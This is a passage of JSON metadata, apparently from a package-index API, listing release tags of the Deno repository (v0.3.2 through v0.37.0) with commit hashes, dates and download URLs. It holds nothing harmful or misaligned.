0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2